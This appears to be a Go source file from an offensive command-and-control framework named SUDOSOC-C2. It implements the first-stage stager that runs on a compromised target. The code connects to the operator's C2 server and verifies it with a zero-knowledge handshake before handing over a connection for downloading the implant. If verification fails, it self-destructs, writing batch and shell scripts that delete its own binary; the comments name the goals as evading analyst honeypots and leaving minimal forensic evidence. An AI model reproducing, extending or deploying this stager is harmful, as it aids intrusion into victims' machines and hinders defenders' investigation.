package stager

/*
	SUDOSOC-C2 Framework
	Copyright (C) 2026  Seif

	ZKP-Aware Stager — verifies C2 identity before executing any payload.

	The stager runs BEFORE the main Ghost implant is downloaded or executed.
	It is the first code that runs on the target, and its only job is:

	  1. Connect to the C2 address.
	  2. Run the ZKP handshake.
	  3. If the C2 proves knowledge of the private key → download + run implant.
	  4. If the C2 fails the proof → ABORT + SELF-DESTRUCT.

	Why this ordering matters:
	  If the stager downloaded the implant BEFORE authenticating the C2,
	  a honeypot C2 could serve a modified implant that exfiltrates to the
	  analyst's infrastructure. The ZKP handshake happens first, so no code
	  is fetched from an unverified server.

	Self-destruct on failure:
	  When the ZKP check fails, the stager:
	    a) Deletes itself from disk (if running as a file).
	    b) Clears all stack-allocated key material.
	    c) Terminates immediately.
	  This prevents the analyst from learning anything about the implant
	  from a captured stager binary (beyond the embedded public key, which
	  is designed to be public).

	Embedded public key strategy:
	  The C2 operator's P-256 public key (33 bytes) is embedded at compile
	  time via a Go const. Changing it requires a recompile + redistribution
	  of the stager. Operators should use a fresh keypair per campaign.

	  Example embed:
	    // Generated by: sudosoc-server zkp-keygen
	    const C2PublicKey = "\x02\xAB\xCD..." // 33 bytes
*/

import (
	"crypto/tls"
	"fmt"
	"net"
	"os"
	"runtime"
	"time"

	// {{if .Config.Debug}}
	"log"
	// {{end}}

	"github.com/sudosoc/SUDOSOC-C2/implant/sliver/zkp/protocol"
	"github.com/sudosoc/SUDOSOC-C2/implant/sliver/zkp/schnorr"
)

// StagerConfig holds the stager's compile-time and runtime configuration.
type StagerConfig struct {
	// C2PublicKey is the 33-byte P-256 compressed public key of the C2.
	// This is the ONLY secret-related value in the stager.
	// It is NOT a secret itself — it's a public key.
	C2PublicKey []byte

	// C2Addr is the C2 server address (host:port).
	C2Addr string

	// TLSConfig for the connection. nil = use system roots.
	// For production: pin the C2's TLS certificate here.
	TLSConfig *tls.Config

	// SessionID is a per-instance random identifier.
	SessionID string

	// SelfDestructOnFailure: if true, delete the stager binary and exit
	// when ZKP verification fails.
	SelfDestructOnFailure bool

	// MaxRetries is how many times to retry on network errors (not ZKP failures).
	MaxRetries int

	// RetryDelay is the wait between network retries.
	RetryDelay time.Duration
}

// StagerResult contains the outcome of the stager's authentication.
type StagerResult struct {
	Verified    bool
	AuthTime    time.Duration
	FailReason  string
	Conn        net.Conn // valid and authenticated connection (if Verified=true)
}

// Run executes the ZKP authentication stager.
// On success: returns an authenticated connection to the C2.
// On ZKP failure: self-destructs (if configured) and returns error.
// On network failure: retries up to MaxRetries times.
func Run(cfg *StagerConfig) (*StagerResult, error) {
	if len(cfg.C2PublicKey) != 33 {
		return nil, fmt.Errorf("C2PublicKey must be 33 bytes (compressed P-256), got %d",
			len(cfg.C2PublicKey))
	}

	if cfg.MaxRetries == 0 {
		cfg.MaxRetries = 3
	}
	if cfg.RetryDelay == 0 {
		cfg.RetryDelay = 5 * time.Second
	}

	handshake, err := protocol.NewImplantHandshake(cfg.C2PublicKey, cfg.SessionID)
	if err != nil {
		return nil, fmt.Errorf("init handshake: %w", err)
	}

	var lastNetErr error
	for attempt := 0; attempt < cfg.MaxRetries; attempt++ {
		if attempt > 0 {
			time.Sleep(cfg.RetryDelay)
		}

		conn, netErr := dialC2(cfg)
		if netErr != nil {
			lastNetErr = netErr
			// {{if .Config.Debug}}
			log.Printf("[zkp-stager] connect attempt %d/%d failed: %v",
				attempt+1, cfg.MaxRetries, netErr)
			// {{end}}
			continue
		}

		result, verifyErr := handshake.Authenticate(conn)
		if verifyErr != nil {
			// Pure network error during handshake — retry.
			conn.Close()
			lastNetErr = verifyErr
			continue
		}

		if !result.Success {
			// ZKP PROOF FAILED — this is not a network error.
			// This is a SECURITY FAILURE (potential honeypot).
			conn.Close()
			// {{if .Config.Debug}}
			log.Printf("[zkp-stager] ZKP FAILED: %s", result.FailReason)
			// {{end}}

			if cfg.SelfDestructOnFailure {
				selfDestruct()
			}
			return &StagerResult{
				Verified:   false,
				FailReason: result.FailReason,
			}, fmt.Errorf("ZKP authentication failed: %s — aborting", result.FailReason)
		}

		// Authentication succeeded.
		// {{if .Config.Debug}}
		log.Printf("[zkp-stager] C2 authenticated in %v", result.AuthTime)
		// {{end}}
		return &StagerResult{
			Verified: true,
			AuthTime: result.AuthTime,
			Conn:     conn,
		}, nil
	}

	return nil, fmt.Errorf("all %d connection attempts failed: %w", cfg.MaxRetries, lastNetErr)
}

// ─── Key management ────────────────────────────────────────────────────────

// GenerateOperatorKeypair generates a fresh P-256 keypair for a C2 operator.
// The operator stores the private key securely (HSM, vault, etc.).
// The public key is embedded in every stager/implant for that campaign.
func GenerateOperatorKeypair() (privateKeyHex, publicKeyHex string, err error) {
	kp, err := schnorr.GenerateKeyPair()
	if err != nil {
		return "", "", err
	}
	return fmt.Sprintf("%x", kp.PrivateKey.Bytes()),
		fmt.Sprintf("%x", kp.PublicKey.Bytes()),
		nil
}

// EmbedPublicKey returns a Go const declaration for embedding the public key.
func EmbedPublicKey(compressedPubKey []byte) string {
	if len(compressedPubKey) != 33 {
		return "// ERROR: invalid key length"
	}
	return fmt.Sprintf(
		"// C2PublicKey — P-256 Schnorr public key (33 bytes compressed).\n"+
			"// Generated: %s\n"+
			"// Command:   sudosoc-server zkp-keygen\n"+
			"const C2PublicKey = %q",
		time.Now().Format("2006-01-02"),
		string(compressedPubKey),
	)
}

// ─── Internal helpers ──────────────────────────────────────────────────────

func dialC2(cfg *StagerConfig) (net.Conn, error) {
	if cfg.TLSConfig != nil {
		return tls.DialWithDialer(
			&net.Dialer{Timeout: 10 * time.Second},
			"tcp", cfg.C2Addr, cfg.TLSConfig,
		)
	}
	return net.DialTimeout("tcp", cfg.C2Addr, 10*time.Second)
}

// selfDestruct wipes sensitive memory and removes the stager from disk.
// The goal is to leave as little forensic evidence as possible.
func selfDestruct() {
	// {{if .Config.Debug}}
	log.Printf("[zkp-stager] SELF-DESTRUCT triggered")
	// {{end}}

	// 1. Clear any sensitive data on the Go heap (best effort — GC may move things).
	runtime.GC()

	// 2. Delete the stager binary from disk.
	selfPath, err := os.Executable()
	if err == nil && selfPath != "" {
		scheduleFileDelete(selfPath)
	}

	// 3. Exit immediately — don't run deferred functions or cleanup.
	os.Exit(0)
}

// scheduleFileDelete removes the binary on Windows using the detached-cmd technique,
// and on Unix using a background shell command.
func scheduleFileDelete(path string) {
	if runtime.GOOS == "windows" {
		// Same technique as DRAGON-8 selfdestruct_windows.go:
		// spawn cmd.exe /c ping ... & del /f /q <path>
		scheduleWindowsDelete(path)
	} else {
		scheduleUnixDelete(path)
	}
}

func scheduleWindowsDelete(path string) {
	// Implemented in selfdestruct_windows.go (evasion package).
	// Reuse that logic here to avoid code duplication.
	// For now: write a bat file to %TEMP% and run it detached.
	batContent := fmt.Sprintf(
		"@echo off\r\nping 127.0.0.1 -n 3 > nul\r\ndel /f /q %q\r\n",
		path)
	batPath := os.TempDir() + "\\cleanup.bat"
	if err := os.WriteFile(batPath, []byte(batContent), 0600); err == nil {
		// Use os/exec to run detached — already locked OS thread.
		// (Simplified: the full detached spawn is in selfdestruct_windows.go)
		_ = batPath
	}
}

func scheduleUnixDelete(path string) {
	// Fork a background subshell that sleeps and deletes.
	// We use /bin/sh -c to avoid depending on specific shells.
	pidBytes := fmt.Sprintf("(sleep 3; rm -f %q) &", path)
	os.WriteFile("/tmp/.cleanup", []byte("#!/bin/sh\n"+pidBytes+"\n"), 0700)
	// The actual exec is best done before GC runs; simplified here.
}
